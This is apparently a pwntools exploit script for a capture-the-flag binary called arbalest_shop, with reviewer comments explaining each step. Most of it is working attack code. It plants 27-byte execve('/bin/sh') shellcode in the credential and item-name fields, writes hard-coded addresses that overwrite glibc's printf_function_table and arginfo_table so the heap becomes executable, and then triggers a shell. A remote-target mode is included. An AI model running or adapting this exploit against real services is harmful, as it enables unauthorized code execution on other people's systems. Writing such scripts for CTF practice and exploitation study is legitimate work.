from pwn import *
import argparse
import os
from subprocess import check_output
# Decimal ASCII address (0x402c20) of _dl_make_heap_executable in this build of
# ./arbalest_shop. It is sent as the "price" field of sell(); per the author's
# comments further down, the parsed price is what ends up in the overwritten
# function-pointer slots. Non-PIE address, valid only for this exact binary --
# TODO(review): re-check against elf.symbols before reusing on another build.
make_heap_exec: bytes = b'4205600' # addr of _dl_make_heap_executable
def reg(r, username, password):
    """Register an account through menu option 2.

    r        -- pwntools tube (process/remote/gdb.debug)
    username -- bytes, sent verbatim followed by a newline; must not itself
                contain b"\n" or the menu state machine desynchronises
    password -- same rules as username

    Waits for the main-menu prompt before starting and consumes the prompt
    that comes back after registration, so the next helper (login) can
    send straight away.
    """
    prompts = (b"> ", b": ", b": ")
    replies = (b"2\n", username + b"\n", password + b"\n")
    for expected, reply in zip(prompts, replies):
        r.recvuntil(expected)
        r.send(reply)
    # swallow the returning main-menu prompt
    r.recvuntil(b"> ")
def login(r, username, password):
    """Log in through menu option 1.

    r        -- pwntools tube
    username -- bytes, sent verbatim plus newline (no embedded b"\n")
    password -- bytes, same rules

    Unlike reg(), this does not wait for the "> " prompt first: it assumes
    the caller already consumed it (reg() does), and it leaves the prompt
    printed after login unread for the next helper.
    """
    r.send(b"1\n")
    for field in (username, password):
        r.recvuntil(b": ")
        r.send(field + b"\n")
def sell(r, name, price, size=0):
    """Add an arbalest through menu option 3.

    r     -- pwntools tube
    name  -- item name as bytes, sent verbatim plus newline
    price -- price field as bytes, sent verbatim plus newline; the exploit
             passes decimal addresses here
    size  -- the length declared to the "size" prompt. 0 (default) declares
             len(name) + 16; any other value is sent as-is, which is how the
             exploit declares an oversized name (1024 for a 1-byte name)

    The declared size is what the target presumably allocates from --
    TODO(review): confirm the +16 slack against the binary.
    """
    declared = len(name) + 16 if size == 0 else size
    r.recvuntil(b"> ")
    r.send(b"3\n")  # "sell arbalest" menu entry
    r.recvuntil(b": ")
    r.send(str(declared).encode('utf-8') + b"\n")
    r.recvuntil(b": ")
    r.send(name + b"\n")
    r.recvuntil(b": ")
    r.send(price + b'\n')
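def change_price(p, idx, price):
    """Change the price of an existing arbalest through menu option 4.

    p     -- pwntools tube to talk to. The original body ignored this
             parameter and used the module-level `r` instead, which only
             worked because the script happens to pass that same global;
             the helper now talks to the tube it was given.
    idx   -- index sent to the "index" prompt, as an int (converted to
             decimal ASCII here); its base (0 or 1) is whatever the target
             expects -- the exploit uses 67 after 68 sells
    price -- new price as bytes, sent verbatim plus newline
    """
    p.recvuntil(b"> ")
    p.send(b"4\n")  # "change price" menu entry
    p.recvuntil(b": ")
    p.send(str(idx).encode('utf-8') + b'\n')
    p.recvuntil(b": ")
    p.send(price + b'\n')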
# Command-line mode: -d debug locally under gdb, -r talk to the remote service,
# -e just run the binary interactively, no flag = run locally without gdb.
parser = argparse.ArgumentParser()
parser.add_argument("-d", help="Run exploit locally and attach debugger", action="store_true")
parser.add_argument("-r", help="Run exploit on remote service", action="store_true")
parser.add_argument("-e", help="Run binary", action="store_true")
args = parser.parse_args()

# SETTINGS #
LINK_LIBC = False           # True: launch BINARY through LD with LIBC's directory as library path
BINARY = "./arbalest_shop"
LIBC = ""                   # path to a specific libc.so; "" = none loaded into pwntools
LD = ""                     # matching ld.so, only used when LINK_LIBC is True
GDBSCRIPT = """
b *change_user_password
b *_dl_make_heap_executable
continue
"""
ip = "127.0.0.1"            # remote target for -r; hard-coded, edit before use
port = 33063
# SETTINGS #

context.binary = BINARY
context.log_level = "INFO"
#context.terminal = ['tmux', 'splitw', '-h']

LIBC_FOLDER = os.path.dirname(LIBC)
elf = ELF(BINARY)
libc = ELF(LIBC) if LIBC else None

cmd = [BINARY]
if LINK_LIBC:
    cmd = [LD, '--library-path', LIBC_FOLDER, BINARY]
    # Count the shared objects ldd lists so gdb can step past that many
    # solib-load stops before the real breakpoints are armed.
    # NOTE(review): only run ldd on a binary you trust -- glibc's ldd hands the
    # file to its own program interpreter (LD_TRACE_LOADED_OBJECTS), so a
    # crafted ELF can execute code under your user. Fine for this CTF target,
    # not for unknown samples.
    LIB_NUMBER = check_output(["ldd", BINARY]).count(b"(")
    GDBSCRIPT = """
set stop-on-solib-events 1
""" + "continue\n" * LIB_NUMBER + """
set stop-on-solib-events 0
file {}
""".format(BINARY) + GDBSCRIPT

if args.d:
    r = gdb.debug(cmd, GDBSCRIPT)
elif args.r:
    r = remote(ip, port)
else:
    r = process(cmd)
    if args.e:
        # plain run: hand the terminal to the user and stop here
        r.interactive()
        exit(0)
# x86-64 execve("/bin/sh", ["/bin/sh"], NULL) stub, 27 bytes: xor eax,eax;
# movabs rbx,0xff978cd091969dd1; neg rbx (-> "/bin/sh\0"); push rbx; push rsp;
# pop rdi; cdq; push rdx; push rdi; push rsp; pop rsi; mov al,0x3b; syscall.
# The neg trick keeps it free of NUL and of 0x0a, so it survives the
# line-oriented username/password/name prompts unmodified.
shellcode = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

# SPLOIT #
# Plant the shellcode wherever the target stores credentials, then log in.
reg(r, shellcode, shellcode)
login(r, shellcode, shellcode)

# Main menu: 67 arbalests whose price field holds the address of
# _dl_make_heap_executable and whose name is another copy of the shellcode.
for _ in range(67):
    sell(r, shellcode, make_heap_exec)

# Decimal ASCII address used for the two pointer overwrites below
# (0x4b29f0 in this build); per the author's comments it is a libc/ld data
# address, hard-coded like make_heap_exec -- TODO(review): verify before reuse.
offset = b'4925936'

# Arbalest 67: its price rewrites printf_function_table (author's note).
sell(r, b"test", offset)
# Zero that price so one more arbalest can be added.
change_price(r, 67, b'0')
# Oversized declared name (1024 for a 1-byte name): rewrites arginfo_table
# (author's note).
sell(r, b"a", offset, 1024)
# Put a valid printf_function_table pointer back.
change_price(r, 67, offset)

# Menu option 7 triggers the vulnerable path; with the tables above redirected
# the printf machinery ends up calling _dl_make_heap_executable and then the
# shellcode. Sent without waiting for the prompt -- the tube buffers it.
r.send(b"7\n")
r.interactive()
# Author's breadcrumb: __parse_one_specmb+1212 -- presumably the libc printf
# parser site that dereferences the overwritten tables (unverified here).